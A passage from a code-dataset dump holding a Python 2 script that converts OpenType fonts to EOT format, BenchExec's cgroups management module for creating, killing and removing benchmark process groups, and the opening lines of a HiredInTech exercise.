# ULONG checkSum // CheckSum for this table.
# ULONG offset // Offset from beginning of TrueType font file.
# ULONG length // Length of this table.
#
# OS/2 Table (Version 4)
#
# USHORT version // 0x0004
# SHORT xAvgCharWidth
# USHORT usWeightClass
# USHORT usWidthClass
# USHORT fsType
# SHORT ySubscriptXSize
# SHORT ySubscriptYSize
# SHORT ySubscriptXOffset
# SHORT ySubscriptYOffset
# SHORT ySuperscriptXSize
# SHORT ySuperscriptYSize
# SHORT ySuperscriptXOffset
# SHORT ySuperscriptYOffset
# SHORT yStrikeoutSize
# SHORT yStrikeoutPosition
# SHORT sFamilyClass
# BYTE panose[10]
# ULONG ulUnicodeRange1 // Bits 0-31
# ULONG ulUnicodeRange2 // Bits 32-63
# ULONG ulUnicodeRange3 // Bits 64-95
# ULONG ulUnicodeRange4 // Bits 96-127
# CHAR achVendID[4]
# USHORT fsSelection
# USHORT usFirstCharIndex
# USHORT usLastCharIndex
# SHORT sTypoAscender
# SHORT sTypoDescender
# SHORT sTypoLineGap
# USHORT usWinAscent
# USHORT usWinDescent
# ULONG ulCodePageRange1 // Bits 0-31
# ULONG ulCodePageRange2 // Bits 32-63
# SHORT sxHeight
# SHORT sCapHeight
# USHORT usDefaultChar
# USHORT usBreakChar
# USHORT usMaxContext
#
#
# The Naming Table is organized as follows:
#
# [name table header]
# [name records]
# [string data]
#
# Name Table Header
#
# USHORT format // Format selector (=0).
# USHORT count // Number of name records.
# USHORT stringOffset // Offset to start of string storage (from start of table).
#
# Name Record
#
# USHORT platformID // Platform ID.
# USHORT encodingID // Platform-specific encoding ID.
# USHORT languageID // Language ID.
# USHORT nameID // Name ID.
# USHORT length // String length (in bytes).
# USHORT offset // String offset from start of storage area (in bytes).
#
# head Table
#
# Fixed tableVersion // Table version number 0x00010000 for version 1.0.
# Fixed fontRevision // Set by font manufacturer.
# ULONG checkSumAdjustment // To compute: set it to 0, sum the entire font as ULONG, then store 0xB1B0AFBA - sum.
# ULONG magicNumber // Set to 0x5F0F3CF5.
# USHORT flags
# USHORT unitsPerEm // Valid range is from 16 to 16384. This value should be a power of 2 for fonts that have TrueType outlines.
# LONGDATETIME created // Number of seconds since 12:00 midnight, January 1, 1904. 64-bit integer
# LONGDATETIME modified // Number of seconds since 12:00 midnight, January 1, 1904. 64-bit integer
# SHORT xMin // For all glyph bounding boxes.
# SHORT yMin
# SHORT xMax
# SHORT yMax
# USHORT macStyle
# USHORT lowestRecPPEM // Smallest readable size in pixels.
# SHORT fontDirectionHint
# SHORT indexToLocFormat // 0 for short offsets, 1 for long.
# SHORT glyphDataFormat // 0 for current format.
#
#
#
# Embedded OpenType (EOT) file format
# http://www.w3.org/Submission/EOT/
#
# EOT version 0x00020001
#
# An EOT font consists of a header with the original OpenType font
# appended at the end. Most of the data in the EOT header is simply a
# copy of data from specific tables within the font data. The exceptions
# are the 'Flags' field and the root string name field. The root string
# is a set of names indicating domains for which the font data can be
# used. A null root string implies the font data can be used anywhere.
# The EOT header is in little-endian byte order but the font data remains
# in big-endian order as specified by the OpenType spec.
#
# Overall structure:
#
# [EOT header]
# [EOT name records]
# [font data]
#
# EOT header
#
# ULONG eotSize // Total structure length in bytes (including string and font data)
# ULONG fontDataSize // Length of the OpenType font (FontData) in bytes
# ULONG version // Version number of this format - 0x00020001
# ULONG flags // Processing Flags (0 == no special processing)
# BYTE fontPANOSE[10] // OS/2 Table panose
# BYTE charset // DEFAULT_CHARSET (0x01)
# BYTE italic // 0x01 if ITALIC in OS/2 Table fsSelection is set, 0 otherwise
# ULONG weight // OS/2 Table usWeightClass
# USHORT fsType // OS/2 Table fsType (specifies embedding permission flags)
# USHORT magicNumber // Magic number for EOT file - 0x504C.
# ULONG unicodeRange1 // OS/2 Table ulUnicodeRange1
# ULONG unicodeRange2 // OS/2 Table ulUnicodeRange2
# ULONG unicodeRange3 // OS/2 Table ulUnicodeRange3
# ULONG unicodeRange4 // OS/2 Table ulUnicodeRange4
# ULONG codePageRange1 // OS/2 Table ulCodePageRange1
# ULONG codePageRange2 // OS/2 Table ulCodePageRange2
# ULONG checkSumAdjustment // head Table CheckSumAdjustment
# ULONG reserved[4] // Reserved - must be 0
# USHORT padding1 // Padding - must be 0
#
# EOT name records
#
# USHORT FamilyNameSize // Font family name size in bytes
# BYTE FamilyName[FamilyNameSize] // Font family name (name ID = 1), little-endian UTF-16
# USHORT Padding2 // Padding - must be 0
#
# USHORT StyleNameSize // Style name size in bytes
# BYTE StyleName[StyleNameSize] // Style name (name ID = 2), little-endian UTF-16
# USHORT Padding3 // Padding - must be 0
#
# USHORT VersionNameSize // Version name size in bytes
# bytes VersionName[VersionNameSize] // Version name (name ID = 5), little-endian UTF-16
# USHORT Padding4 // Padding - must be 0
#
# USHORT FullNameSize // Full name size in bytes
# BYTE FullName[FullNameSize] // Full name (name ID = 4), little-endian UTF-16
# USHORT Padding5 // Padding - must be 0
#
# USHORT RootStringSize // Root string size in bytes
# BYTE RootString[RootStringSize] // Root string, little-endian UTF-16
import optparse
import struct
class FontError(Exception):
    """Raised when font data is malformed, truncated, or of an unsupported type."""
    pass
def multichar(data):
    """Pack the first four bytes of *data* into a big-endian 32-bit tag value.

    Used for OpenType/EOT table tags such as b'head' or b'OTTO'.
    (Parameter renamed from ``str``, which shadowed the builtin; all call
    sites in this file pass it positionally.)
    """
    b0, b1, b2, b3 = struct.unpack('4B', data[:4])
    return (b0 << 24) | (b1 << 16) | (b2 << 8) | b3
def multicharval(v):
    """Return the 4-byte big-endian representation of the 32-bit tag *v*."""
    # Equivalent to packing each shifted-and-masked byte individually:
    # masking the whole value to 32 bits and packing big-endian yields the
    # exact same four bytes.
    return struct.pack('>I', v & 0xFFFFFFFF)
class EOT:
    """Constants describing the Embedded OpenType (EOT) header layout."""
    EOT_VERSION = 0x00020001        # version field of the EOT header
    EOT_MAGIC_NUMBER = 0x504c       # 'LP' magic marking an EOT file
    EOT_DEFAULT_CHARSET = 0x01      # DEFAULT_CHARSET
    EOT_FAMILY_NAME_INDEX = 0       # order of names in variable portion of EOT header
    EOT_STYLE_NAME_INDEX = 1
    EOT_VERSION_NAME_INDEX = 2
    EOT_FULL_NAME_INDEX = 3
    EOT_NUM_NAMES = 4
    # little-endian struct format of the fixed EOT header (see file comment)
    EOT_HEADER_PACK = '<4L10B2BL2H7L18x'
class OpenType:
    """Constants and struct formats for parsing OpenType (SFNT) font files."""
    # SFNT version values
    SFNT_CFF = multichar('OTTO') # Postscript CFF SFNT version
    SFNT_TRUE = 0x10000 # Standard TrueType version
    SFNT_APPLE = multichar('true') # Apple TrueType version
    # big-endian struct formats for the SFNT header and table directory entry
    SFNT_UNPACK = '>I4H'
    TABLE_DIR_UNPACK = '>4I'
    TABLE_HEAD = multichar('head') # TrueType table tags
    TABLE_NAME = multichar('name')
    TABLE_OS2 = multichar('OS/2')
    TABLE_GLYF = multichar('glyf')
    TABLE_CFF = multichar('CFF ')
    # OS/2 table: fsSelection ITALIC bit, and partial unpack formats
    OS2_FSSELECTION_ITALIC = 0x1
    OS2_UNPACK = '>4xH2xH22x10B4L4xH14x2L'
    HEAD_UNPACK = '>8xL'
    NAME_RECORD_UNPACK = '>6H'
    # 'name' table name IDs
    NAME_ID_FAMILY = 1
    NAME_ID_STYLE = 2
    NAME_ID_UNIQUE = 3
    NAME_ID_FULL = 4
    NAME_ID_VERSION = 5
    NAME_ID_POSTSCRIPT = 6
    # 'name' table platform / encoding / language selectors
    PLATFORM_ID_UNICODE = 0 # Mac OS uses this typically
    PLATFORM_ID_MICROSOFT = 3
    ENCODING_ID_MICROSOFT_UNICODEBMP = 1 # with Microsoft platformID BMP-only Unicode encoding
    LANG_ID_MICROSOFT_EN_US = 0x0409 # with Microsoft platformID EN US lang code
def eotname(ttf):
    """Map a font filename to its EOT-Lite output name (extension -> .eotlite)."""
    stem, sep, _ext = ttf.rpartition('.')
    # No '.' found: keep the whole name; otherwise drop the last extension.
    return (stem if sep else ttf) + '.eotlite'
def readfont(f):
    """Read the whole font file *f* and return its contents as bytes.

    Uses a context manager so the file handle is always closed; the original
    left the handle open (leak).
    """
    with open(f, 'rb') as fh:
        return fh.read()
def get_table_directory(data):
    """Parse the SFNT header and table directory of an OpenType font.

    Returns a dict with 'version', 'numTables' and 'tableDir', where
    'tableDir' maps a numeric table tag to {'offset', 'length', 'checksum'}.

    Raises FontError if the data is truncated or not a TrueType/CFF SFNT.
    (Raise statements converted to the call form, valid in both Python 2
    and 3; the old ``raise E, msg`` form is a SyntaxError under Python 3.)
    """
    datalen = len(data)
    sfntsize = struct.calcsize(OpenType.SFNT_UNPACK)
    if sfntsize > datalen:
        raise FontError('truncated font data')
    sfntvers, numTables = struct.unpack(OpenType.SFNT_UNPACK, data[:sfntsize])[:2]
    if sfntvers != OpenType.SFNT_CFF and sfntvers != OpenType.SFNT_TRUE:
        raise FontError('invalid font type')
    font = {}
    font['version'] = sfntvers
    font['numTables'] = numTables
    # create set of offsets, lengths for tables
    table_dir_size = struct.calcsize(OpenType.TABLE_DIR_UNPACK)
    if sfntsize + table_dir_size * numTables > datalen:
        raise FontError('truncated font data, table directory extends past end of data')
    table_dir = {}
    for i in range(0, numTables):
        start = sfntsize + i * table_dir_size
        end = start + table_dir_size
        tag, check, bongo, dirlen = struct.unpack(OpenType.TABLE_DIR_UNPACK, data[start:end])
        table_dir[tag] = {'offset': bongo, 'length': dirlen, 'checksum': check}
    font['tableDir'] = table_dir
    return font
def get_name_records(nametable):
    """Parse the 'name' table, keeping only Microsoft/Unicode-BMP/en-US records.

    Returns {'count', 'strOffset', 'namerecords'} where 'namerecords' maps a
    name ID to {'offset', 'length'} relative to the table's string storage.

    Raises FontError when the record count exceeds the table size.
    (Raise statement converted to the call form so the module also parses
    under Python 3.)
    """
    name = {}
    # read the header
    headersize = 6
    count, strOffset = struct.unpack('>2H', nametable[2:6])
    namerecsize = struct.calcsize(OpenType.NAME_RECORD_UNPACK)
    if count * namerecsize + headersize > len(nametable):
        raise FontError('names exceed size of name table')
    name['count'] = count
    name['strOffset'] = strOffset
    # read through the name records
    namerecs = {}
    for i in range(0, count):
        start = headersize + i * namerecsize
        end = start + namerecsize
        platformID, encodingID, languageID, nameID, namelen, offset = struct.unpack(OpenType.NAME_RECORD_UNPACK, nametable[start:end])
        if platformID != OpenType.PLATFORM_ID_MICROSOFT or \
           encodingID != OpenType.ENCODING_ID_MICROSOFT_UNICODEBMP or \
           languageID != OpenType.LANG_ID_MICROSOFT_EN_US:
            continue
        namerecs[nameID] = {'offset': offset, 'length': namelen}
    name['namerecords'] = namerecs
    return name
def make_eot_name_headers(fontdata, nameTableDir):
    """Extract family/style/version/full names from the 'name' table and build
    the variable-length name portion of the EOT header.

    Missing names are emitted as a zero length field plus zero padding.
    """
    nameoffset = nameTableDir['offset']
    namelen = nameTableDir['length']
    name = get_name_records(fontdata[nameoffset : nameoffset + namelen])
    namestroffset = name['strOffset']
    namerecs = name['namerecords']
    eotnames = (OpenType.NAME_ID_FAMILY, OpenType.NAME_ID_STYLE, OpenType.NAME_ID_VERSION, OpenType.NAME_ID_FULL)
    nameheaders = []
    for nameid in eotnames:
        if nameid in namerecs:
            namerecord = namerecs[nameid]
            noffset = namerecord['offset']
            nlen = namerecord['length']
            # Floor division: under Python 3 the original `nlen / 2` yields a
            # float, which '%d' silently truncates — `//` states the intent
            # and behaves identically under Python 2.
            nformat = '%dH' % (nlen // 2)  # length is in number of bytes
            start = nameoffset + namestroffset + noffset
            end = start + nlen
            nstr = struct.unpack('>' + nformat, fontdata[start:end])
            nameheaders.append(struct.pack('<H' + nformat + '2x', nlen, *nstr))
        else:
            nameheaders.append(struct.pack('4x'))  # len = 0, padding = 0
    return ''.join(nameheaders)
# just return a null-string (len = 0)
def make_root_string():
    """Return an empty EOT root string: a zero RootStringSize (USHORT) and no data."""
    # Two zero bytes — identical to struct.pack('2x'); a null root string
    # means the font may be used on any domain.
    return b'\x00\x00'
def make_eot_header(fontdata):
    """Build the complete EOT header (fixed part + name headers + root string)
    for the given OpenType font data.

    Raises FontError when a required table ('head', 'name', 'OS/2') is missing
    or a table is shorter than its fixed unpack format.
    (Raise statements converted to the call form, valid under both Python 2
    and 3; the table-tag bytes are decoded before concatenating into the
    error message so the concat also works under Python 3.)
    """
    fontDataSize = len(fontdata)
    font = get_table_directory(fontdata)
    # toss out .otf fonts, t2embed library doesn't support these
    tableDir = font['tableDir']
    # check for required tables
    required = (OpenType.TABLE_HEAD, OpenType.TABLE_NAME, OpenType.TABLE_OS2)
    for table in required:
        if not (table in tableDir):
            raise FontError('missing required table ' + multicharval(table).decode('latin-1'))
    # read name strings
    # pull out data from individual tables to construct fixed header portion
    # need to calculate eotSize before packing
    version = EOT.EOT_VERSION
    flags = 0
    charset = EOT.EOT_DEFAULT_CHARSET
    magicNumber = EOT.EOT_MAGIC_NUMBER
    # read values from OS/2 table
    os2Dir = tableDir[OpenType.TABLE_OS2]
    os2offset = os2Dir['offset']
    os2size = struct.calcsize(OpenType.OS2_UNPACK)
    if os2size > os2Dir['length']:
        raise FontError('OS/2 table invalid length')
    os2fields = struct.unpack(OpenType.OS2_UNPACK, fontdata[os2offset : os2offset + os2size])
    panose = []
    urange = []
    codepage = []
    weight, fsType = os2fields[:2]
    panose[:10] = os2fields[2:12]
    urange[:4] = os2fields[12:16]
    fsSelection = os2fields[16]
    codepage[:2] = os2fields[17:19]
    italic = fsSelection & OpenType.OS2_FSSELECTION_ITALIC
    # read in values from head table
    headDir = tableDir[OpenType.TABLE_HEAD]
    headoffset = headDir['offset']
    headsize = struct.calcsize(OpenType.HEAD_UNPACK)
    if headsize > headDir['length']:
        raise FontError('head table invalid length')
    headfields = struct.unpack(OpenType.HEAD_UNPACK, fontdata[headoffset : headoffset + headsize])
    checkSumAdjustment = headfields[0]
    # make name headers
    nameheaders = make_eot_name_headers(fontdata, tableDir[OpenType.TABLE_NAME])
    rootstring = make_root_string()
    # calculate the total eot size
    eotSize = struct.calcsize(EOT.EOT_HEADER_PACK) + len(nameheaders) + len(rootstring) + fontDataSize
    fixed = struct.pack(EOT.EOT_HEADER_PACK,
                        *([eotSize, fontDataSize, version, flags] + panose + [charset, italic] +
                          [weight, fsType, magicNumber] + urange + codepage + [checkSumAdjustment]))
    return ''.join((fixed, nameheaders, rootstring))
def write_eot_font(eot, header, data):
    """Write a complete EOT font file to disk.

    :param eot: path of the EOT file to create (overwritten if it exists)
    :param header: packed EOT header produced by make_eot_header()
    :param data: raw OpenType font data to append after the header
    :return: None
    """
    # Use a context manager so the file handle is closed even if a write
    # fails (the original relied on CPython refcounting to close it).
    # Writing the two pieces separately produces byte-identical output to
    # the old ''.join((header, data)) and also works for bytes objects.
    with open(eot, 'wb') as out:
        out.write(header)
        out.write(data)
    return
def main():
    """Convert each font file given on the command line to an EOT file.

    Reads every positional argument as a font file path; files that cannot
    be read are reported and skipped.  NOTE: Python 2 script (print
    statements); the --output option is parsed but never used.
    """
    # deal with options
    p = optparse.OptionParser()
    p.add_option('--output', '-o', default="world")
    options, args = p.parse_args()
    # iterate over font files
    for f in args:
        data = readfont(f)
        if len(data) == 0:
            # readfont signals failure with an empty string
            print 'Error reading %s' % f
        else:
            # derive the output name, build the EOT header, write the file
            eot = eotname(f)
            header = make_eot_header(data)
            write_eot_font(eot, header, data)

if __name__ == '__main__':
    main()
| [
"[email protected]"
] | |
6f4f8fbbcb0e5c348c98918c383284323a004ea4 | e7a2670b983ae37b4a73ec9db4ce1c7967ae635c | /benchexec/cgroups.py | 5ca4adef56608a870834b68bf6bdf2aaaeb73312 | [
"Apache-2.0"
] | permissive | zmanchun/benchexec | 89bba7b908b1782ad8c771c61ce529ced1c6bce6 | 92427e52840184d51bb88af79e2c10ee5c5fb145 | refs/heads/master | 2021-01-17T17:22:27.917477 | 2017-01-07T16:47:44 | 2017-01-07T16:47:44 | 43,826,931 | 0 | 0 | null | 2015-10-07T15:49:57 | 2015-10-07T15:49:57 | null | UTF-8 | Python | false | false | 15,618 | py | # BenchExec is a framework for reliable benchmarking.
# This file is part of BenchExec.
#
# Copyright (C) 2007-2015 Dirk Beyer
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# prepare for Python 3
from __future__ import absolute_import, division, print_function, unicode_literals
# THIS MODULE HAS TO WORK WITH PYTHON 2.7!
import logging
import os
import shutil
import signal
import tempfile
import time
from benchexec import util
# Public API of this module.
__all__ = [
    'find_my_cgroups',
    'find_cgroups_of_process',
    'BLKIO',
    'CPUACCT',
    'CPUSET',
    'FREEZER',
    'MEMORY',
]

# Prefix for the temporary child cgroup directories created for each run.
CGROUP_NAME_PREFIX='benchmark_'

# Names of the cgroup subsystems (controllers) that BenchExec uses.
BLKIO = 'blkio'
CPUACCT = 'cpuacct'
CPUSET = 'cpuset'
FREEZER = 'freezer'
MEMORY = 'memory'

# All subsystem names we recognize when parsing /proc/mounts.
ALL_KNOWN_SUBSYSTEMS = set([
    # cgroups for BenchExec
    BLKIO, CPUACCT, CPUSET, FREEZER, MEMORY,
    # other cgroups users might want
    'cpu', 'devices', 'net_cls', 'net_prio', 'hugetlb', 'perf_event', 'pids',
    ])
def find_my_cgroups(cgroup_paths=None):
    """Build a Cgroup object for the cgroups of the current process.

    Not every subsystem is guaranteed to be present in the result (a
    subsystem may simply not be mounted); check with "subsystem in <instance>"
    before use.  A present subsystem may still lack permission for creating
    child cgroups; check that with require_subsystem().

    @param cgroup_paths: optional iterable of /proc/<pid>/cgroup lines to use
                         instead of reading /proc/self/cgroup.
    """
    logging.debug('Analyzing /proc/mounts and /proc/self/cgroup for determining cgroups.')
    if cgroup_paths is None:
        own_cgroups = dict(_find_own_cgroups())
    else:
        own_cgroups = dict(_parse_proc_pid_cgroup(cgroup_paths))

    # Skip mount points we cannot access at all, e.g. because a parent
    # directory has insufficient permissions (lxcfs mounts cgroups under
    # /run/lxcfs in such a way).
    parents = {
        subsystem: os.path.join(mount, own_cgroups[subsystem])
        for subsystem, mount in _find_cgroup_mounts()
        if os.access(mount, os.F_OK)}
    return Cgroup(parents)
def find_cgroups_of_process(pid):
    """Build a Cgroup object describing the cgroups of the process *pid*."""
    proc_file = '/proc/{}/cgroup'.format(pid)
    with open(proc_file, 'rt') as cgroups_file:
        return find_my_cgroups(cgroups_file)
def _find_cgroup_mounts():
    """Yield one (subsystem, mountpoint) pair for every mounted cgroup
    controller that appears in /proc/mounts."""
    try:
        with open('/proc/mounts', 'rt') as mounts:
            for line in mounts:
                fields = line.split(' ')
                # /proc/mounts format: device mountpoint fstype options ...
                if fields[2] != 'cgroup':
                    continue
                mountpoint = fields[1]
                for option in fields[3].split(','):
                    if option in ALL_KNOWN_SUBSYSTEMS:
                        yield (option, mountpoint)
    except IOError:
        logging.exception('Cannot read /proc/mounts')
def _find_own_cgroups():
    """Yield (subsystem, cgroup) pairs describing which (sub-)cgroup this
    process is in, for every hierarchy.
    (A process is in exactly one cgroup per hierarchy.)
    """
    try:
        with open('/proc/self/cgroup', 'rt') as own_file:
            for pair in _parse_proc_pid_cgroup(own_file):
                yield pair
    except IOError:
        logging.exception('Cannot read /proc/self/cgroup')
def _parse_proc_pid_cgroup(content):
"""
Parse a /proc/*/cgroup file into tuples of (subsystem,cgroup).
@param content: An iterable over the lines of the file.
@return: a generator of tuples
"""
for ownCgroup in content:
#each line is "id:subsystem,subsystem:path"
ownCgroup = ownCgroup.strip().split(':')
try:
path = ownCgroup[2][1:] # remove leading /
except IndexError:
raise IndexError("index out of range for " + str(ownCgroup))
for subsystem in ownCgroup[1].split(','):
yield (subsystem, path)
def kill_all_tasks_in_cgroup(cgroup, kill_process_fn):
    """Kill every process listed in the given cgroup directory.

    Repeatedly freezes the cgroup (if the freezer subsystem is available),
    signals every PID in its "tasks" file via kill_process_fn(pid, sig),
    thaws it, and waits; returns only once a pass finds the cgroup empty.

    @param cgroup: path of the cgroup directory
    @param kill_process_fn: callable (pid, signal) that sends the signal
    """
    tasksFile = os.path.join(cgroup, 'tasks')
    freezer_file = os.path.join(cgroup, 'freezer.state')

    def try_write_to_freezer(content):
        try:
            util.write_file(content, freezer_file)
        except IOError:
            pass # expected if freezer not enabled, we try killing without it

    i = 0
    while True:
        i += 1
        # TODO We can probably remove this loop over signals and just send
        # SIGKILL. We added this loop when killing sub-processes was not reliable
        # and we did not know why, but now it is reliable.
        for sig in [signal.SIGKILL, signal.SIGINT, signal.SIGTERM]:
            # Freeze first so processes cannot fork while we enumerate them.
            try_write_to_freezer('FROZEN')
            with open(tasksFile, 'rt') as tasks:
                task = None
                for task in tasks:
                    task = task.strip()
                    if i > 1:
                        # Anything still alive after the first pass is worth a warning.
                        logging.warning('Run has left-over process with pid %s '
                                        'in cgroup %s, sending signal %s (try %s).',
                                        task, cgroup, sig, i)
                    kill_process_fn(int(task), sig)

                if task is None:
                    return # No process was hanging, exit
            # Thaw so the signaled processes can actually terminate.
            try_write_to_freezer('THAWED')
            time.sleep(i * 0.5) # wait for the process to exit, this might take some time
def remove_cgroup(cgroup):
    """Delete an (empty) cgroup directory, retrying once if it is busy.

    Asserts that the cgroup contains no tasks; logs a warning instead of
    raising if the directory is missing or cannot be removed.
    """
    if not os.path.exists(cgroup):
        logging.warning('Cannot remove CGroup %s, because it does not exist.', cgroup)
        return
    # An empty "tasks" file means no process is attached to this cgroup.
    assert os.path.getsize(os.path.join(cgroup, 'tasks')) == 0
    try:
        os.rmdir(cgroup)
    except OSError:
        # sometimes this fails because the cgroup is still busy, we try again once
        try:
            os.rmdir(cgroup)
        except OSError as e:
            logging.warning("Failed to remove cgroup %s: error %s (%s)",
                            cgroup, e.errno, e.strerror)
def _register_process_with_cgrulesengd(pid):
    """Tell cgrulesengd daemon to not move the given process into other cgroups,
    if libcgroup is available.

    Best-effort: all failures (missing library, init failure, registration
    failure) are silently ignored because this may run inside preexec_fn.
    """
    # Logging/printing from inside preexec_fn would end up in the output file,
    # not in the correct logger, thus it is disabled here.
    from ctypes import cdll
    try:
        libcgroup = cdll.LoadLibrary('libcgroup.so.1')
        failure = libcgroup.cgroup_init()
        if failure:
            pass
            #print('Could not initialize libcgroup, error {}'.format(success))
        else:
            # Flag value from libcgroup: also keep child processes unchanged.
            CGROUP_DAEMON_UNCHANGE_CHILDREN = 0x1
            failure = libcgroup.cgroup_register_unchanged_process(pid, CGROUP_DAEMON_UNCHANGE_CHILDREN)
            if failure:
                pass
                #print('Could not register process to cgrulesndg, error {}. '
                #      'Probably the daemon will mess up our cgroups.'.format(success))
    except OSError:
        # libcgroup is not installed; nothing to do.
        pass
        #print('libcgroup is not available: {}'.format(e.strerror))
class Cgroup(object):
    """Represents one cgroup directory per subsystem for a single process
    (or group of processes) and provides operations on them.
    """

    def __init__(self, cgroupsPerSubsystem):
        assert set(cgroupsPerSubsystem.keys()) <= ALL_KNOWN_SUBSYSTEMS
        assert all(cgroupsPerSubsystem.values())
        # Mapping subsystem name -> cgroup directory.
        # Invariant: self.paths is recomputed on every update to this mapping.
        self.per_subsystem = cgroupsPerSubsystem
        self.paths = set(cgroupsPerSubsystem.values()) # without duplicates

    def __contains__(self, key):
        return key in self.per_subsystem

    def __getitem__(self, key):
        return self.per_subsystem[key]

    def __str__(self):
        return str(self.paths)

    def require_subsystem(self, subsystem):
        """
        Check whether the given subsystem is enabled and is writable
        (i.e., new cgroups can be created for it).
        Produces a log message for the user if one of the conditions is not fulfilled.
        If the subsystem is enabled but not writable, it will be removed from
        this instance such that further checks with "in" will return "False".
        @return A boolean value.
        """
        if subsystem not in self:
            logging.warning('Cgroup subsystem %s is not enabled. Please enable it with '
                            '"sudo mount -t cgroup none /sys/fs/cgroup".',
                            subsystem)
            return False

        try:
            # Probe write access by creating and removing a child cgroup.
            test_cgroup = self.create_fresh_child_cgroup(subsystem)
            test_cgroup.remove()
        except OSError as e:
            logging.warning('Cannot use cgroup hierarchy mounted at {0} for subsystem {1}, '
                            'reason: {2}. '
                            'If permissions are wrong, please run "sudo chmod o+wt \'{0}\'".'
                            .format(self.per_subsystem[subsystem], subsystem, e.strerror))
            del self.per_subsystem[subsystem]
            # BUGFIX: recompute self.paths *after* deleting the subsystem
            # (previously it was recomputed before the deletion, so the
            # unusable path stayed in self.paths).
            self.paths = set(self.per_subsystem.values())
            return False

        return True

    def create_fresh_child_cgroup(self, *subsystems):
        """
        Create child cgroups of the current cgroup for at least the given subsystems.
        @return: A Cgroup instance representing the new child cgroup(s).
        """
        assert set(subsystems).issubset(self.per_subsystem.keys())
        createdCgroupsPerSubsystem = {}
        createdCgroupsPerParent = {}
        for subsystem in subsystems:
            parentCgroup = self.per_subsystem[subsystem]
            if parentCgroup in createdCgroupsPerParent:
                # reuse already created cgroup (subsystems co-mounted in one hierarchy)
                createdCgroupsPerSubsystem[subsystem] = createdCgroupsPerParent[parentCgroup]
                continue

            cgroup = tempfile.mkdtemp(prefix=CGROUP_NAME_PREFIX, dir=parentCgroup)
            createdCgroupsPerSubsystem[subsystem] = cgroup
            createdCgroupsPerParent[parentCgroup] = cgroup

            # add allowed cpus and memory to cgroup if necessary
            # (otherwise we can't add any tasks)
            def copy_parent_to_child(name):
                shutil.copyfile(os.path.join(parentCgroup, name), os.path.join(cgroup, name))
            try:
                copy_parent_to_child('cpuset.cpus')
                copy_parent_to_child('cpuset.mems')
            except IOError:
                # expected to fail if cpuset subsystem is not enabled in this hierarchy
                pass

        return Cgroup(createdCgroupsPerSubsystem)

    def add_task(self, pid):
        """
        Add a process to the cgroups represented by this instance.
        """
        # Prevent cgrulesengd from moving the process elsewhere afterwards.
        _register_process_with_cgrulesengd(pid)
        for cgroup in self.paths:
            with open(os.path.join(cgroup, 'tasks'), 'w') as tasksFile:
                tasksFile.write(str(pid))

    def get_all_tasks(self, subsystem):
        """
        Return a generator of all PIDs currently in this cgroup for the given subsystem.
        """
        with open(os.path.join(self.per_subsystem[subsystem], 'tasks'), 'r') as tasksFile:
            for line in tasksFile:
                yield int(line)

    def kill_all_tasks(self, kill_process_fn):
        """
        Kill all tasks in this cgroup forcefully.
        """
        for cgroup in self.paths:
            kill_all_tasks_in_cgroup(cgroup, kill_process_fn)

    def kill_all_tasks_recursively(self, kill_process_fn):
        """
        Kill all tasks in this cgroup and all its children cgroups forcefully.
        Additionally, the children cgroups will be deleted.
        """
        def kill_all_tasks_in_cgroup_recursively(cgroup):
            # Depth-first: empty and delete child cgroups before killing here.
            files = [os.path.join(cgroup,f) for f in os.listdir(cgroup)]
            subdirs = filter(os.path.isdir, files)

            for subCgroup in subdirs:
                kill_all_tasks_in_cgroup_recursively(subCgroup)
                remove_cgroup(subCgroup)

            kill_all_tasks_in_cgroup(cgroup, kill_process_fn)

        for cgroup in self.paths:
            kill_all_tasks_in_cgroup_recursively(cgroup)

    def has_value(self, subsystem, option):
        """
        Check whether the given value exists in the given subsystem.
        Does not make a difference whether the value is readable, writable, or both.
        Do not include the subsystem name in the option name.
        Only call this method if the given subsystem is available.
        """
        assert subsystem in self
        return os.path.isfile(os.path.join(self.per_subsystem[subsystem], subsystem + '.' + option))

    def get_value(self, subsystem, option):
        """
        Read the given value from the given subsystem.
        Do not include the subsystem name in the option name.
        Only call this method if the given subsystem is available.
        """
        assert subsystem in self, 'Subsystem {} is missing'.format(subsystem)
        return util.read_file(self.per_subsystem[subsystem], subsystem + '.' + option)

    def get_file_lines(self, subsystem, option):
        """
        Read the lines of the given file from the given subsystem.
        Do not include the subsystem name in the option name.
        Only call this method if the given subsystem is available.
        """
        assert subsystem in self
        with open(os.path.join(self.per_subsystem[subsystem], subsystem + '.' + option)) as f:
            for line in f:
                yield line

    def get_key_value_pairs(self, subsystem, filename):
        """
        Read the lines of the given file from the given subsystem
        and split the lines into key-value pairs.
        Do not include the subsystem name in the option name.
        Only call this method if the given subsystem is available.
        """
        assert subsystem in self
        return util.read_key_value_pairs_from_file(self.per_subsystem[subsystem], subsystem + '.' + filename)

    def set_value(self, subsystem, option, value):
        """
        Write the given value for the given subsystem.
        Do not include the subsystem name in the option name.
        Only call this method if the given subsystem is available.
        """
        assert subsystem in self
        util.write_file(str(value), self.per_subsystem[subsystem], subsystem + '.' + option)

    def remove(self):
        """
        Remove all cgroups this instance represents from the system.
        This instance is afterwards not usable anymore!
        """
        for cgroup in self.paths:
            remove_cgroup(cgroup)

        del self.paths
        del self.per_subsystem

    def read_cputime(self):
        """
        Read the cputime usage of this cgroup. CPUACCT cgroup needs to be available.
        @return cputime usage in seconds
        """
        return float(self.get_value(CPUACCT, 'usage'))/1000000000 # nano-seconds to seconds

    def read_allowed_memory_banks(self):
        """Get the list of all memory banks allowed by this cgroup."""
        return util.parse_int_list(self.get_value(CPUSET, 'mems'))
| [
"[email protected]"
] | |
654f21379131c530e86ac551da8784b4feab6062 | 7e2d802a17e42d50974af29e4c9b658d5da6471b | /HiredInTech/08-cover-the-border.py | e684983873eb1f32812cae3542721e131940be47 | [] | no_license | siddharthadtt1/Leet | a46290bacdf569f69d523413c0129676727cb20e | 1d8b96257f94e16d0c1ccf8d8e8cd3cbd9bdabce | refs/heads/master | 2020-06-20T16:21:15.915761 | 2017-05-15T22:35:42 | 2017-05-15T22:35:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,751 | py | ''' HiredInTech solution '''
def cover_the_border(l, radars):
# Example arguments:
# l = 100
# radars = [ [5, 10], [3, 25], [46, 99], [39, 40], [45, 50] ]
